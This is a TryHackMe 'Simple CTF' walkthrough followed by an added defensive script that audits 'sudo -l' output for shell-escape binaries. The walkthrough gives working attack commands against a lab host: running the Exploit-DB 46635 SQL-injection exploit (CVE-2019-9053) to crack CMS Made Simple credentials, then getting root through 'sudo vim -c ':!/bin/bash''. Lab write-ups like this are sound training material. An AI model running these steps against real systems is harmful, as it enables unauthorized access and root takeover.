TryHackMe - SimpleCTF
We download the exploit to our Kali machine: wget https://www.exploit-db.com/download/46635
We can also check whether the credentials work over SSH (remember to specify the port in your ssh command, because SSH is not on the default port 22):
ssh mitch@10.10.104.30 -p 2222
sudo -l
We find out that vim is allowed.
How many services are running under port 1000?
Answer 2
What is running on the higher port?
Answer ssh
What's the CVE you're using against the application?
Answer CVE-2019-9053
Reading the exploit, we understand that the app is vulnerable to a time-based SQL injection.
To what kind of vulnerability is the application vulnerable?
Answer SQLi
What's the password?
I will let you find this on your own
Where can you login with the details obtained?
Answer ssh
What's the user flag?
I will let you find this on your own. Hint: cat user.txt
Is there any other user in the home directory? What's its name?
We run ls /home and find the user sunbath.
What can you leverage to spawn a privileged shell?
Answer vim
What's the root flag?
I will let you find this on your own. Hint: cat /root/root.txt
We find a page running CMS Made Simple, which has a known CVE. We can try the exploit:
python 46635 -u http://10.10.61.2/simple/ --crack -w /usr/share/seclists/Passwords/Common-Credentials/best110.txt
Once the credentials are found, we can log in here: http://10.10.61.2/simple/admin/login.php
We can use this trick: sudo vim -c ':!/bin/bash'
I just changed it to get a bash shell
It works
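From the defender's side, the sudo rule that makes this work can be caught by auditing `sudo -l` output for programs that can spawn a shell. The script below is an added example, not part of the original write-up; the sample output, the hostname and the short binary list are constructed assumptions.

```python
import os
import re

# Small, non-exhaustive set of programs that can start a shell from inside.
SHELL_ESCAPE = {"vim", "vi", "view", "less", "more", "man", "nano", "find", "awk"}

RULE = re.compile(r"^\s*\(([^)]*)\)\s*(.+)$")   # "(root) NOPASSWD: /usr/bin/vim"
TAG = re.compile(r"^([A-Z_]+):\s*")             # "NOPASSWD: ", "NOEXEC: ", ...

# Constructed sample of `sudo -l` output (not taken from the target machine).
SAMPLE = """\
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim
    (root) NOEXEC: /usr/bin/less /var/log/syslog, EXEC: /usr/bin/find
    (root) sudoedit /etc/hosts
"""


def audit_sudo_l(output):
    """Return (runas, command, reason) for every rule that hands out a shell."""
    findings = []
    for line in output.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # header and Defaults lines
        runas, noexec = m.group(1), False
        # Simplification: commands containing escaped commas are not handled.
        for cmd in m.group(2).split(","):
            cmd = cmd.strip()
            # Tags are sticky: NOEXEC applies until a later EXEC resets it.
            while (t := TAG.match(cmd)):
                if t.group(1) in ("NOEXEC", "EXEC"):
                    noexec = t.group(1) == "NOEXEC"
                cmd = cmd[t.end():]
            if not cmd:
                continue
            name = os.path.basename(cmd.split()[0])
            if cmd == "ALL":
                findings.append((runas, cmd, "unrestricted"))
            elif name in SHELL_ESCAPE and not noexec:
                findings.append((runas, cmd, "shell escape"))
    return findings


if __name__ == "__main__":
    for runas, cmd, reason in audit_sudo_l(SAMPLE):
        print(f"[!] {cmd} as {runas}: {reason}")
```

Where a user only needs to edit specific files as root, a `sudoedit` rule for those files avoids running the editor itself with root privileges.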